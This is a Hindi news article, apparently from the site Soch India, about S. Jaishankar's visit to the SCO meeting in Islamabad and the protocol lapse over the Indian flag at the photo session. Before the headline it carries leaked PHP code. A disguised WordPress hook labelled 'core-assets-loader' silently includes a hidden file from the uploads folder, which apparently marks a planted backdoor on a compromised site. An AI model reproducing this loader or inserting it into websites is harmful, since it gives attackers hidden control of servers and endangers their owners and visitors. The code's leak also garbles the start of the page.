add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); SCO मंच पर खड़े थे जयशंकर, क्यों पीछे तिरंगा लेकर दौड़ने लगे पाकिस्तानी अधिकारी – SOCH INDIA
Menu

देश
SCO मंच पर खड़े थे जयशंकर, क्यों पीछे तिरंगा लेकर दौड़ने लगे पाकिस्तानी अधिकारी

nobanner

पाकिस्तान की राजधानी इस्लामाबाद में शंघाई सहयोग संगठन (SCO) के दूसरे दिन जिन्ना कन्वेंशन सेंटर में फोटो सेशन के दौरान भारी बदइंतजामी नजर आई. फोटो सेशन के दौरान पाकिस्तान ने प्रोटोकॉल की धज्जियां उड़ा दी और उसकी खीझ सीधी नजर आई. फोटो शूट के लिए भारतीय विदेश मंत्री एस जयशंकर चीन और रूस समेत अन्य देशों के नेताओं के साथ खड़े हो गए थे, लेकिन तब तक भारतीय तिरंगा नहीं लगाया गया था. जयशंकर के खड़े होने के बाद पाकिस्तानी अधिकारी पीछे से तिरंगा लेकर आए.

शहबाज शरीफ ने किया एस जयशंकर का स्वागत

पाकिस्तान के प्रधानमंत्री शहबाज शरीफ ने बुधवार को इस्लामाबाद में एससीओ शिखर सम्मेलन के आयोजन स्थल पर विदेश एस जयशंकर का स्वागत किया. विदेश मंत्री एससीओ (शंघाई सहयोग संगठन) शासनाध्यक्ष परिषद (सीएचजी) की 23वीं बैठक में भाग लेने के लिए इस्लामाबाद में हैं. आयोजन की शुरुआत मंगलवार शाम को पाकिस्तान के प्रधानमंत्री शहबाज शरीफ द्वारा आयोजित वेलकम डिनर के साथ हुई.

विदेश मंत्री ने भारतीय उच्चायोग में लगाया पौधा

इससे पहले एस जयशंकर ने पाकिस्तान स्थित इंडियन हाई कमिशन कैंपस में सुबह की सैर की और प्रधानमंत्री नरेंद्र मोदी के ‘एक पेड़ मां के नाम’ अभियान को बढ़ावा देते हुए एक पौधा लगाया. विदेश मंत्री ने एक्स पर लिखा, ‘पाकिस्तान में भारतीय उच्चायोग की टीम के सहकर्मियों के साथ हमारे हाई कमिशन कैंपस में सुबह की सैर.’ एक अन्य पोस्ट में उन्होंने लिखा, ‘कैंपस में अर्जुन का पौधा #प्लांट फॉर मदर के प्रति एक और प्रतिबद्धता। #एक_पेड़_मां_के_नाम ‘

9 साल बाद भारतीय विदेश मंत्री का पाकिस्तान दौरा

यह 9 साल में किसी भारतीय विदेश मंत्री की पहली पाकिस्तान यात्रा है. इससे पहले विदेश मंत्री स्वर्गीय सुषमा स्वराज ने अफगानिस्तान पर एक सुरक्षा सम्मेलन में भाग लेने के लिए 2015 में इस्लामाबाद का दौरा किया था. मंगलवार दोपहर को विदेश मंत्री जयशंकर के नेतृत्व में भारतीय प्रतिनिधिमंडल रावलपिंडी के नूर खान एयरबेस पर पहुंचा.

सिर्फ 24 घंटे पाकिस्तान में रहेंगे एस जयशंकर

हालांकि, विदेश मंत्री जयशंकर के इस्लामाबाद में केवल 24 घंटे रहने की उम्मीद है और बैठक के दौरान भारत-पाकिस्तान के बीच कोई द्विपक्षीय बैठक निर्धारित नहीं है. लेकिन इसके बावजूद पाकिस्तान में सत्तारूढ़ सरकार के कई मंत्रियों और विपक्षी नेताओं ने घरेलू राजनीतिक लाभ के लिए उनके आगमन पर ध्यान केंद्रित कर रखा है.

एस जयशंकर के पाकिस्तान पहुंचने के कुछ ही घंटों बाद इस्लामाबाद ने मंगलवार को कहा कि यह भारत को तय करना है कि वह सम्मेलन के दौरान पाकिस्तानी पक्ष के साथ द्विपक्षीय बैठक करना चाहता है या नहीं. पाकिस्तान के योजना एवं विकास मंत्री अहसान इकबाल ने कहा कि एससीओ बैठक के मेजबान के रूप में पाकिस्तान मेहमानों की पसंद के अनुसार काम करेगा.

एससीओ सम्मेलन में कौन-कौन हुआ शामिल?

एससीओ के अन्य सदस्य देशों का प्रतिनिधित्व चीन, रूस, बेलारूस, कजाकिस्तान, किर्गिस्तान, ताजिकिस्तान और उज्बेकिस्तान के प्रधानमंत्रियों के साथ-साथ ईरान के प्रथम उपराष्ट्रपति कर रहे हैं. मंगोलिया के प्रधानमंत्री (पर्यवेक्षक राज्य) और मंत्रिपरिषद के उपाध्यक्ष, तुर्कमेनिस्तान के विदेश मंत्री (विशेष अतिथि) भी बैठक में भाग ले रहे हैं.